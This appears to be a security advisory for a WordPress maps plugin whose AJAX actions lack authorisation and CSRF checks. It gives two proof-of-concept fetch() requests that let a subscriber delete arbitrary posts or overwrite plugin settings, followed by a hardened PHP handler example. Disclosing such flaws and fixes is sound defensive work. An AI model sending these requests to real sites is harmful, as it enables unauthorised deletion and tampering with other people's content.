The plugin does not have proper authorisation and CSRF checks in most of its AJAX actions, which could allow any authenticated user, such as a subscriber, to delete arbitrary posts and update the plugin's settings. v1.8.1 added authorisation checks; however, CSRF checks were still missing, and a separate advisory has been created for that issue.
Removing post:
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=wpgmapembed_remove_wpgmap&post_id=1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
Updating settings:
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=wpgmapembed_save_setup_wizard&wgm_api_key=hohohoho&wgm_language=999&wgm_regional_area=aaaaa",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
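For comparison, a sketch of how the two AJAX actions above could enforce both checks (an added example, not the plugin's own code). The action and parameter names are taken from the requests above; the helper name, the nonce action and field, the use of `wp_delete_post()` and the option names are assumptions.

```php
<?php
// Added example: hypothetical hardened handlers, not the plugin's real code.
// Action and parameter names come from the requests above; everything else
// (helper name, nonce action/field, option names) is an assumption.

const WGM_EXAMPLE_NONCE = 'wgm_example_ajax'; // assumed nonce action

function wgm_example_guard( $capability, $object_id = null ) {
    // CSRF: reject requests without a valid nonce in the "_ajax_nonce" field.
    if ( ! check_ajax_referer( WGM_EXAMPLE_NONCE, '_ajax_nonce', false ) ) {
        wp_send_json_error( 'Invalid nonce', 403 );
    }
    // Authorisation: being logged in is not enough, the user must hold
    // the capability (checked against the object when one is given).
    $allowed = ( null === $object_id )
        ? current_user_can( $capability )
        : current_user_can( $capability, $object_id );
    if ( ! $allowed ) {
        wp_send_json_error( 'Forbidden', 403 );
    }
}

add_action( 'wp_ajax_wpgmapembed_remove_wpgmap', function () {
    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    // A subscriber fails this meta-capability check for other users' posts.
    wgm_example_guard( 'delete_post', $post_id );
    wp_delete_post( $post_id ); // assumed removal mechanism
    wp_send_json_success();
} );

add_action( 'wp_ajax_wpgmapembed_save_setup_wizard', function () {
    // Settings changes are limited to administrators.
    wgm_example_guard( 'manage_options' );
    $fields = array( 'wgm_api_key', 'wgm_language', 'wgm_regional_area' );
    foreach ( $fields as $key ) {
        if ( isset( $_POST[ $key ] ) ) {
            // Option names mirror the request parameters (assumption).
            $value = sanitize_text_field( wp_unslash( $_POST[ $key ] ) );
            update_option( $key, $value );
        }
    }
    wp_send_json_success();
} );
```

The admin page that issues these requests would need to send a matching value from `wp_create_nonce()` in the `_ajax_nonce` field. Restricting deletion to the plugin's own post type would narrow the handler further; that post type name is not given on this page.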